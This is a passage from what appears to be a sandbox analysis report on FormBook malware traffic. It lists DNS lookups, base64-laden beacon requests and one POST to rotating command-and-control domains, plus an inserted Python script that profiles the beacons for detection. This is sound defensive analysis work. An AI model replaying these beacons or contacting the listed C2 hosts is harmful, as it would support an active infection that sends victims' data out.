              GET /yl6y/?u8b=M0MH_xux6&prutfR_P=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+FSdSIKD6JgMVQEI+NVmTQ69s3vAAdvPATGhITAPXZUXQ6A== HTTP/1.1
              Host: www.independent200.org
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
              GET /06rp/?prutfR_P=ziZdrN3wZJ2qpMxPB7kqr9VBePBO99X6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYa0I3+Rjxysn3aWSNR3EoirWNXIk0ludq4g7uCmltVJnspg==&u8b=M0MH_xux6 HTTP/1.1
              Host: www.tigre777gg.online
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
              GET /wwak/?prutfR_P=E3TGpDthwwVtcd6zArHMi0+elvxdJNsp076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUa15ZbVJvSSR5vxb+VJw93FLmyr7mIfPMGWfmtP/A6wTj3w==&u8b=M0MH_xux6 HTTP/1.1
              Host: www.personal-loans-jp8.xyz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
              GET /vnd3/?prutfR_P=xYBn5zztkuVfiCwoRQOy2opDl7RgoPyR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERRmF7/bt0PBBiFKuaDRgyJqJJ+MxR9VKTQpRM54mqQi17vQ==&u8b=M0MH_xux6 HTTP/1.1
              Host: www.quantumnests.xyz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
              GET /n59g/?prutfR_P=5pnE2UHiCW8ObGXSgpx/iGO8gW0d7AEBtxaudhAi15+uyfG3JVq1h0FDH1nQvWuKz1Kon5CV4Z0icGbf56g2ha7dmOKO9m7V5QX/Ut0iNssFIOAJa+JBBsuFpAHajyYobg==&u8b=M0MH_xux6 HTTP/1.1
              Host: www.parcelfly.net
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
              GET /0vb3/?prutfR_P=xUzASW4UVirhqEepkKH7G1hhCXRgKJ+LG3aq8idvTSxDBC+AgnYLMr8gyh0BIXno1CEegJvcgs9HgFk4HlC4XGXQkMAamkZroN1kMIfewJ5xcpTkuE3fYdnwX+QQCm9qWw==&u8b=M0MH_xux6 HTTP/1.1
              Host: www.shipincheshi.skin
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
              GET /f3w9/?prutfR_P=Dh4Gi9+74bFgt7GfY7nAkA9WO4K4BtRildy9F7aGfftu7RHBnk3NlrVThFQn4aec5hsiNdt2NoWcO3TRD6+a1p9HDTSMRDAgwWxIW4AdBTiWqaWdzxLVl6hXjmw9P5qUhA==&u8b=M0MH_xux6 HTTP/1.1
              Host: www.fimgroup.net
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.linkbasic.net
Source: global traffic | DNS traffic detected: DNS query: www.chamadaslotgiris.net
Source: global traffic | DNS traffic detected: DNS query: www.masteriocp.online
Source: global traffic | DNS traffic detected: DNS query: www.mediaplug.biz
Source: global traffic | DNS traffic detected: DNS query: www.independent200.org
Source: global traffic | DNS traffic detected: DNS query: www.tigre777gg.online
Source: global traffic | DNS traffic detected: DNS query: www.monos.shop
Source: global traffic | DNS traffic detected: DNS query: www.personal-loans-jp8.xyz
Source: global traffic | DNS traffic detected: DNS query: www.quantumnests.xyz
Source: global traffic | DNS traffic detected: DNS query: www.abbabyfernando.online
Source: global traffic | DNS traffic detected: DNS query: www.parcelfly.net
Source: global traffic | DNS traffic detected: DNS query: www.siyue.xyz
Source: global traffic | DNS traffic detected: DNS query: www.shipincheshi.skin
Source: global traffic | DNS traffic detected: DNS query: www.fimgroup.net
Source: unknown | HTTP traffic detected:
POST /p5rq/ HTTP/1.1
Host: www.masteriocp.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Connection: close
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.masteriocp.online
Referer: http://www.masteriocp.online/p5rq/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Raw: 70 72 75 74 66 52 5f 50 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 75 51 5a 6f 6c 4e 77 4c 4f 61 2b 75 72 43 7a 4f 38 6a 70 65 37 6a 78 78 30 69 34 66 6e 75 43 53 76 56 73 75 48 56 49 3d
Data Ascii: prutfR_P=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uQZolNwLOa+urCzO8jpe7jxx0i4fnuCSvVsuHVI=
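The six GETs and the POST above share one shape: a single short path segment, the same query parameter name carrying a base64 blob on every request, a second parameter whose value never changes, one User-Agent, Connection: close, and a different host each time. The following is an added example of turning that shape into a detection check; it is not code from the Joe Sandbox report or from FormBook. The request texts are constructed from the captured requests (hosts, paths, query strings, POST body and a subset of the headers copied from the report), the helper names are my own, and nothing here decrypts the prutfR_P payload; the check only measures the traffic.

```python
"""Profile the HTTP beacons captured above as a detection check.

Added example; not code from the Joe Sandbox report or from FormBook. The
request texts are constructed from the six GETs and the POST shown in the
report (hosts, paths, query strings, body and a subset of the headers copied
from the capture). Nothing here decrypts the payload, it only measures shape.
"""
import base64
from collections import Counter

# Copied from the capture: an Android browser UA emitted by a Windows host.
UA = ("Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) "
      "AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 "
      "Chrome/34.0.1847.76 Mobile Safari/537.36")
ACCEPT = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"


def _get(path, query, host):
    """Constructed GET request text with the headers seen in the capture."""
    return (f"GET {path}?{query} HTTP/1.1\r\nHost: {host}\r\nAccept: {ACCEPT}\r\n"
            f"Accept-Language: en-US\r\nConnection: close\r\nUser-Agent: {UA}\r\n\r\n")


CAPTURED = [
    _get("/06rp/", "prutfR_P=ziZdrN3wZJ2qpMxPB7kqr9VBePBO99X6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYa0I3+Rjxysn3aWSNR3EoirWNXIk0ludq4g7uCmltVJnspg==&u8b=M0MH_xux6", "www.tigre777gg.online"),
    _get("/wwak/", "prutfR_P=E3TGpDthwwVtcd6zArHMi0+elvxdJNsp076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUa15ZbVJvSSR5vxb+VJw93FLmyr7mIfPMGWfmtP/A6wTj3w==&u8b=M0MH_xux6", "www.personal-loans-jp8.xyz"),
    _get("/vnd3/", "prutfR_P=xYBn5zztkuVfiCwoRQOy2opDl7RgoPyR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERRmF7/bt0PBBiFKuaDRgyJqJJ+MxR9VKTQpRM54mqQi17vQ==&u8b=M0MH_xux6", "www.quantumnests.xyz"),
    _get("/n59g/", "prutfR_P=5pnE2UHiCW8ObGXSgpx/iGO8gW0d7AEBtxaudhAi15+uyfG3JVq1h0FDH1nQvWuKz1Kon5CV4Z0icGbf56g2ha7dmOKO9m7V5QX/Ut0iNssFIOAJa+JBBsuFpAHajyYobg==&u8b=M0MH_xux6", "www.parcelfly.net"),
    _get("/0vb3/", "prutfR_P=xUzASW4UVirhqEepkKH7G1hhCXRgKJ+LG3aq8idvTSxDBC+AgnYLMr8gyh0BIXno1CEegJvcgs9HgFk4HlC4XGXQkMAamkZroN1kMIfewJ5xcpTkuE3fYdnwX+QQCm9qWw==&u8b=M0MH_xux6", "www.shipincheshi.skin"),
    _get("/f3w9/", "prutfR_P=Dh4Gi9+74bFgt7GfY7nAkA9WO4K4BtRildy9F7aGfftu7RHBnk3NlrVThFQn4aec5hsiNdt2NoWcO3TRD6+a1p9HDTSMRDAgwWxIW4AdBTiWqaWdzxLVl6hXjmw9P5qUhA==&u8b=M0MH_xux6", "www.fimgroup.net"),
    # The POST carries the same parameter name in a form-encoded body.
    ("POST /p5rq/ HTTP/1.1\r\nHost: www.masteriocp.online\r\nConnection: close\r\n"
     "Content-Length: 209\r\nContent-Type: application/x-www-form-urlencoded\r\n"
     f"User-Agent: {UA}\r\n\r\n"
     "prutfR_P=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uQZolNwLOa+urCzO8jpe7jxx0i4fnuCSvVsuHVI="),
]


def parse_request(raw):
    """Split one HTTP/1.1 request into method, path, raw key/value pairs, headers.

    The pairs are split by hand rather than with urllib.parse.parse_qs, which
    would turn '+' into a space and so corrupt base64 values.
    """
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    pairs = []
    for part in (query if method == "GET" else body).split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return {"method": method, "path": path, "pairs": pairs, "headers": headers}


def b64_len(value):
    """Decoded byte length if value is strict base64, else None."""
    try:
        return len(base64.b64decode(value, validate=True))
    except ValueError:  # binascii.Error is a ValueError
        return None


def beacon_profile(raw_requests, min_hosts=3):
    """Summarise a batch of requests and flag a beacon rotating across hosts:
    a parameter name present on every request, a value that never changes (an
    identifier), base64 blobs everywhere else, one UA, Connection: close on
    every request, and at least min_hosts distinct hosts."""
    reqs = [parse_request(r) for r in raw_requests]
    key_sets = [{k for k, _ in r["pairs"]} for r in reqs]
    shared = set.intersection(*key_sets) if key_sets else set()
    seen = Counter(k for ks in key_sets for k in ks)
    constant = {}
    for key in seen:
        values = {v for r in reqs for k, v in r["pairs"] if k == key}
        if seen[key] >= 2 and len(values) == 1:
            constant[key] = values.pop()
    hosts = sorted({r["headers"].get("host", "") for r in reqs})
    profile = {
        "hosts": hosts,
        "shared_keys": sorted(shared),
        "constant_values": constant,
        "path_lengths": sorted({len(r["path"].strip("/")) for r in reqs}),
        "user_agents": sorted({r["headers"].get("user-agent", "") for r in reqs}),
        "connection_close": all(r["headers"].get("connection", "").lower() == "close" for r in reqs),
        "payload_bytes": [b64_len(v) for r in reqs for k, v in r["pairs"] if k not in constant],
    }
    profile["suspicious"] = (
        len(hosts) >= min_hosts
        and bool(shared)
        and len(profile["user_agents"]) == 1
        and profile["connection_close"]
        and bool(profile["payload_bytes"])
        and all(n is not None for n in profile["payload_bytes"])
    )
    return profile


if __name__ == "__main__":
    for key, value in beacon_profile(CAPTURED).items():
        print(f"{key}: {value}")
```

Run against the seven captured requests, the profile reports seven hosts, prutfR_P as the one key present everywhere, u8b=M0MH_xux6 as the constant value, four-character path segments throughout, and a valid base64 payload on every request (97 bytes in each GET, 149 in the POST). A single request to one host, or a batch whose values are not base64, is not flagged.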
Source: global traffic | HTTP traffic detected:
HTTP/1.1 403 Forbidden
Content-Type: text/plain; charset=utf-8
Date: Mon, 16 Sep 2024 07:39:12 GMT
Content-Length: 11
Connection: close
Data Raw: 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: Bad Request

Source: global traffic | HTTP traffic detected:
HTTP/1.1 403 Forbidden
Content-Type: text/plain; charset=utf-8
Date: Mon, 16 Sep 2024 07:39:15 GMT
Content-Length: 11
Connection: close
Data Raw: 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: Bad Request

Source: global traffic | HTTP traffic detected:
HTTP/1.1 403 Forbidden
Content-Type: text/plain; charset=utf-8
Date: Mon, 16 Sep 2024 07:39:18 GMT
Content-Length: 11
Connection: close
Data Raw: 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: Bad Request

Source: global traffic | HTTP traffic detected:
HTTP/1.1 403 Forbidden
Content-Type: text/plain; charset=utf-8
Date: Mon, 16 Sep 2024 07:39:20 GMT
Content-Length: 11
Connection: close
Data Raw: 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: Bad Request
Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Mon, 16 Sep 2024 07:40:03 GMT
Server: Apache
Content-Length: 18121
Connection: close
Content-Type: text/html
Data Ascii (decoded from the captured hex; the capture stops partway into the 18121-byte body):
<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
  <title>404 Not Found</title>
  <link rel="stylesheet" href="/404style.css">

</head>
<body>
<!-- partial:index.partial.html -->
<div class="main">
  <div>
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355">
  <g id="ocean">
    <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/>
    <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667">
      <stop offset="0" stop-color="#fff"/>
      <stop offset="1" stop-color="#b3dcdf"/>
    </linearGradient>
    <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/>
    <path id="land" class="st0" d="M0 273.4h1000V354H0z"/>
    <g id="bumps">
      <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/>
    <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/>
    <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9

Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Mon, 16 Sep 2024 07:40:09 GMT
Server: Apache
Content-Length: 18121
Connection: close
Content-Type: text/html
Data Ascii: same 18121-byte 404 page as the 07:40:03 response above; the captured prefix is byte-for-byte identical.

Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Mon, 16 Sep 2024 07:40:09 GMT
Server: Apache
Content-Length: 18121
Connection: close
Content-Type: text/html
Data Ascii: same 18121-byte 404 page as the 07:40:03 response above; the captured prefix is byte-for-byte identical.

Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Mon, 16 Sep 2024 07:40:09 GMT
Server: Apache
Content-Length: 18121
Connection: close
Content-Type: text/html
Data Ascii: same 18121-byte 404 page as the 07:40:03 response above; the captured prefix is byte-for-byte identical.

Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Mon, 16 Sep 2024 07:40:11 GMT
Server: Apache
Content-Length: 18121
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: same 18121-byte 404 page as the 07:40:03 response above; the captured prefix is byte-for-byte identical.
Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Mon, 16 Sep 2024 07:52:08 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4837
Content-Type: text/html; charset=utf-8
Data Raw (gzip-compressed body, capture truncated): 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 1b 45 92 ff f9 f8 2b fa 4c 40 32 48 1a 49 56 64 d9 96 cd 2a b2 fc 85 d8 96 91 e4 84 1c c9 e9 b5 66 5a d2 e0 d1 f4 30 d3 b2 ad 84 bc 07 77 bb c0 de 25 04 16 8e 4d ee e0 b8 c0 7b 84 07 b7 c9 de ee 1e b0 40 b8 7f 26 72 9c 9f ee 5f b8 ea d1 b7 d1 4c 4b 16 0a c8 bb 37 7e b6 35 3d d5 d5 9f aa ae aa ae 6a cd 4c f2 6f 97 b3 e9 c2 85 ed 0c aa b2 9a b6 f4 44 b2 f3 8f 60 65 e9 09 04 47 b2 46 18 46 72 15 9b 16 61 8b 53 3b 85 95 60 62 aa 7d 89 a9 4c 23 4b 0f ff f8 dd c3 ef 3e 6e de 78 f7 e1 fb 1f 3f 7a ff d6 d1 bd 7b 49 a9 75 c5 c1 40 c7 35 b2 38 65 d2 12 65 d6 14 92 a9 ce 88 0e ec 74 aa ea 0a 39 08 e8 b4 4c 35 8d ee 4f 21 a9 dd cb 62 8d 0e 07 7e 48 cf a0 33 d8 22 e8 19 a9 db 54 a2 4a 03 5d e9 9e f2 43 a6 1a 35 e7 d1 93 33 33 33 0b 7d 17 ca 30 e0 3c 8a c4 8d 03 74 8e 98 0a d6 71 00 4d ad 11 6d 8f 30 55 c6 68 8b d4 c9 54 00 55 3b 0d 01 94 32 55 ac 05 90 6f 53 95 4d 6a d1 32 43 17 f0 1a 51 7d 01 64 61 dd 0a 5a c4 54 cb fd 43 d4 b0 59 51 f5 79 14 ee 6f 36 b0 a2 a8 7a 05 da 51 34 0c c3 f3 3f 3d 8a ab dd 4f d5 c8 15 21 bb 08 ef 14 76 73 e5 f2 04 2d f5 32 99 47 d1 84 93 61 f7 e2 3e 51 2b 55 90 f9 74 d8 d5 55 53 75 12 ac b6 af ce 44 07 a0 89 8a 15 1b 8b 26 12 32 19 32 5c cc 3d 5c 57 7e ae fb b0 58 65 f1 63 44 8c 78 44 2c 51 53 21 66 10 ac 89 d1 1a 10 00 03 8b 6a aa 82 9e 24 84 08 05 9a 19 a0 de a8 50 7b ed 71 e3 43 55 5b a2 9a 22 1a 0b 97 4a a6 4b 7d 75 d3 e2 fa 03 03 33 fa 19 32 72 c0 82 0a 91 a9 89 99 4a 01 50 1d fc c1 e4 73 34 94 2e 68 bb c7 3c 52 40 01 44 0c 42 3c 81 89 38 ff 59 10 a2 33 c0 19 19 31 85 dc e6 ab 74 8f b8 a4 1a 05 7b 8f 45 c8 36 3c 62 9a d4 c5 a6 84 e5 dd 8a 49 a1 33 e0 2b 27 e4 92 5c 72 f6 ef 31 20 72 95 22 86 4b 1a 71 b9 fd be aa b0 2a 77 95 f0 53 43
7a 1a a6 bb 5f d7 36 bd 13 cd a5 2d 43 40 9a 47 b8 ce e8 40 0b 49 9c 7e 6a 88 77 45 42 b1 d3 0b 03 64 0d 76 66 a4 3c cb 7f 44 e6 ed 89 25 6d ab 37 b1 a2 d6 2d 70 5e a1 75 96 71 4d d5 1a f3 28 4d 75 70 09 6c 41 a0 db 50 4b a4 35 47 68 93 ea 14 22 dd 26 d1 35 1a 00 9a ba a9 12 33 80 6a d0 6c 19 58 26 c7 e8 6f 69 98 16 07 78 77 d8 6d 0d ce a0 9e 39 90 89 61 23 5b d7 cb d4 19 de 43 a4 7b 49 e4 ba 41 46 8d f9 81 d1 d4 d1 39 54 23 96 85 2b 64 d0 d4 7b 02 40 47 f9 8e a0 a2 28 8a 70 26 3a f1 27 8c 74 ea f6 d8 7e 4b 10 07 69 db 88 bc c6 d7 e6 0e 12 06 35 52 66 dd 09 8f 0d 21 34 f9 40 83 29 c5 a6 e1 b5 8c 8e 45 74 56 c9 a9 e6 0f 77 8f ee df 7b f4 6f bf 7a f4 dd bb 53 03 ac a3 a7 6b 99 2a 2e 45 83 13 61 50 00 97 43 10 d1 b0 a6 56 c0 44 64 d2 1f 78 f8 d1 f5 8f b2 70 a1 6d 09 2c 9a bf 21 5e ed 72 20 af 3e 9d a1 68 6e 6e ee 38 d3 b2 40 5b 32 09 7a a5 76 ae 7a a3 59 d7 90 90 38 c7 7f c4 e1 29 78 d0 09 50 a3 23 e5 2e 2c 5e 0c 3d 9e 7a 0c 17 44 b5 63 19 f1 63 58 f6 a0 a8 96 a1 61 30 4a 55 b7 3d a6 a4 51 79 d7 35 e1 30 db c2 10 df d2 e7 01 77
Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Mon, 16 Sep 2024 07:52:11 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4860
Content-Type: text/html; charset=utf-8
Data Raw (gzip-compressed body, capture truncated): 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 db 46 72 ff b9 fe 2b b6 8c 13 52 09 09 90 d4 37 4a a2 94 d2 14 25 d1 91 44 99 a4 6c eb 62 97 0f 04 96 24 22 10 0b 03 4b 51 b2 e3 f7 92 f6 2e c9 b5 76 9c 5c d2 9c dd 26 cd 39 79 2f c9 4b 7a f6 f5 ae 4d 72 49 9c fe 33 a6 2c ff d4 7f a1 b3 e0 37 10 58 52 34 9d 50 77 85 9e 24 62 31 3b fb 99 d9 99 d9 99 25 80 f8 df 2e 67 92 f9 9d ad 14 aa d0 aa b6 74 2a de fe 87 25 65 e9 14 82 23 5e c5 54 42 72 45 32 2d 4c 17 7d db f9 95 50 cc d7 ba 44 55 aa e1 a5 47 7f fa fe d1 f7 1f 37 6e bd fb e8 fd 8f 1f bf 7f e7 e8 fe fd b8 d8 bc e2 60 a0 4b 55 bc e8 33 49 91 50 cb 87 64 a2 53 ac 03 3b 9d a8 ba 82 f7 83 3a 29 11 4d 23 75 1f 12 5b bd 2c 7a d0 e6 c0 0e f1 79 74 46 b2 30 7a 5e ec 34 15 89 72 80 ae 75 4e d9 21 13 8d 98 f3 e8 99 c9 c9 c9 85 9e 0b 25 18 70 1e 45 66 8c 7d 74 1e 9b 8a a4 4b 41 e4 5b c3 da 1e a6 aa 2c a1 4d 5c c3 be 20 aa b4 1b 82 28 61 aa 92 16 44 fe 0d 55 36 89 45 4a 14 ed 48 6b 58 f5 07 91 25 e9 56 c8 c2 a6 5a ea 1d a2 2a 99 65 55 9f 47 e1 de 66 43 52 14 55 2f 43 3b 8a 86 61 78 f6 a7 4b 71 bd f3 a9 12 b9 c6 65 17 61 9d c2 6e ae 4c 9e 90 a5 5e c5 f3 28 1a 73 32 ec 5c ac 63 b5 5c 01 99 a7 c3 ae ae 9a aa e3 50 a5 75 75 32 da 07 4d 94 af d8 a9 68 2c 26 e3 01 c3 4d b9 87 eb c8 cf 74 1f e6 ab 6c e6 18 11 23 1e 11 8b c4 54 b0 19 02 6b a2 a4 0a 04 c0 c0 22 9a aa a0 67 30 c6 5c 81 26 fb a8 37 ca d5 5e 6b dc 99 81 aa 2d 12 4d e1 8d 25 15 8b a6 4b 7d 35 d3 62 fa 03 03 33 7a 19 52 bc 4f 43 0a 96 89 29 51 95 00 a0 1a f8 83 c9 e6 68 20 5d c8 76 8f 79 a4 80 02 30 1f 04 7f 02 63 33 ec 67 81 8b ce 00 67 a4 d8 e4 72 9b af 90 3d ec 92 6a 18 ec 5d 16 82 6d 78 d8 34 89 8b 4d 51 92 77 cb 26 81 ce 80 af 14 93 8b 72 d1 d9 bf cb 00 cb 15 82 a8 54 d4 b0 cb ed eb aa 42 2b cc 55 c2 cf
0e e8 69 98 ee 7e 1d db f4 4e 34 93 b6 04 01 69 1e 49 35 4a fa 5a 48 6c fa d9 01 de 15 11 a6 a6 17 fa c8 1a 6a cf 48 69 96 fd f0 cc db 13 4b 5a 56 6f 4a 8a 5a b3 c0 79 b9 d6 59 92 aa aa 76 30 8f 92 44 07 97 90 2c 08 74 eb 6a 11 37 e7 08 6d 10 9d 40 a4 db c0 ba 46 82 40 53 33 55 6c 06 51 15 9a 2d 43 92 f1 31 fa 5b 1a a4 c5 3e de 1d 76 5b 83 33 a8 a7 f6 65 6c d8 c8 d2 7a 89 38 c3 bb 80 3b 97 78 ae 1b a2 c4 98 ef 1b 4d 1d 9d 85 2a b6 2c a9 8c fb 4d bd 27 00 b4 95 ef 08 2a 8a a2 70 67 a2 1d 7f c2 48 27 6e 8f ed b5 04 7e 90 b6 8d c8 6b 7c 2d ee 20 61 48 c3 25 da 99 f0 a9 01 84 26 1b a8 3f 25 df 34 bc 96 d1 b6 88 f6 2a e9 6b fc 78 ef e8 c1 fd c7 ff f6 ab c7 df bf eb eb 63 1d 5d 5d cb 44 71 29 1a 9c 48 02 05 30 39 38 11 4d d2 d4 32 98 88 8c 7b 03 0f 3b 3a fe 51 e2 2e b4 4d 81 79 f3 37 c0 ab 5d 0e e4 d5 a7 33 14 cd cd cd 1d 67 5a 16 68 4b c6 21 af d4 ce 55 6f 38 eb 1a 10 12 e7 d8 0f 3f 3c 85 f6 db 01 6a 78 a4 cc 85 f9 8b a1 c7 53 8f e1 82 88 76 2c 23 76 0c ca 1e 14 d5 32 34 09 8c 52 d5 6d 8f 29 6a 44 de 75 4d 38 cc 36 37 c4 37 f5 b9
Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Mon, 16 Sep 2024 07:52:13 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5757
Content-Type: text/html; charset=utf-8
Data Raw (gzip-compressed body, capture truncated): 1f 8b 08 00 00 00 00 00 00 03 dd 5c 7b 77 e3 c6 75 ff bb fe 14 53 65 63 49 b6 48 80 6f 52 d2 2a a5 28 8a a4 c4 97 f8 10 45 d9 ae 0e 08 0c 09 88 20 06 02 06 7c c8 de 73 92 36 b1 9d d6 eb b5 93 d4 b1 db a4 8e 9d 73 62 9f a4 59 a7 49 1b 3b 76 d6 fd 32 4b ed ee 5f fd 0a 9d 01 1f 02 49 90 92 b9 36 95 14 3a 92 88 c1 9d 3b bf 7b e7 de 3b f7 0e 01 6c fe ed 4e 26 52 28 67 a3 40 c4 0d 79 eb 99 cd c1 3f c8 09 5b cf 00 72 6c 36 20 e6 00 2f 72 9a 0e f1 ed a5 62 61 d7 11 5c ea 5f c2 12 96 e1 d6 a3 3f 7c f1 e8 8b f7 bb f7 de 7e f4 93 f7 9f fc e4 bd c7 9f 7c b2 c9 f4 ae 58 18 28 5c 03 de 5e d2 50 05 61 7d 09 f0 48 c1 50 21 ec 14 24 29 02 6c af 29 a8 8a 64 19 b5 96 00 d3 ef a5 e3 ce 80 03 3d 98 e7 c0 36 a7 43 f0 1c 33 6c aa 20 a1 03 5e 1e 9e d2 83 47 32 d2 d6 c1 b7 3c 1e cf c6 c8 85 2a 19 70 1d b8 fc 6a 1b 1c 42 4d e0 14 6e 0d 2c c5 a1 dc 84 58 e2 39 90 86 06 5c 5a 03 e2 a0 61 0d 84 35 89 93 d7 c0 72 4a e2 35 a4 a3 2a 06 65 2e 0e a5 e5 35 a0 73 8a ee d0 a1 26 55 47 87 